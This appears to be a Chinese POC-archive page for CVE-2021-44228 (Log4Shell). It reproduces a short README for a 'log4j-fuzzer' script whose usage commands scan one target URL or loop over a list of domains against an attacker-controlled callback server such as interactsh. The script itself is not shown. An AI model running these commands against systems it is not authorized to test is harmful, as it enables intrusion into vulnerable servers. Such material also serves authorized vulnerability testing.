关联漏洞
描述
CVE-2021-44228
介绍
# log4j-fuzzer
## For Single Target
```bash
chmod +x log4j
```
After That Command Simply Put Your Target
```bash
./log4j [YOUR_TARGET_URL] [YOUR_REMOTE_SERVER]
```
## For Multiple Target
**Gether All Domain, Subdomain, Directroty in a list**
After That Simply Command This
```bash
chmod +x log4j
```
You Can Create a remote server With https://github.com/projectdiscovery/interactsh or else try `DNSLOG.CN` this
```bash
cat [put_your_list_name_here.txt] | while read line ; do ./log4j $line [YOUR_Remote_Server_IP/URL_HERE] ;done
```
文件快照
[4.0K] /data/pocs/c7fcc76bcd93f9545e3bfb6d0695ca3efb225a01
├── [1.0K] LICENSE
├── [3.7K] log4j
└── [ 542] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。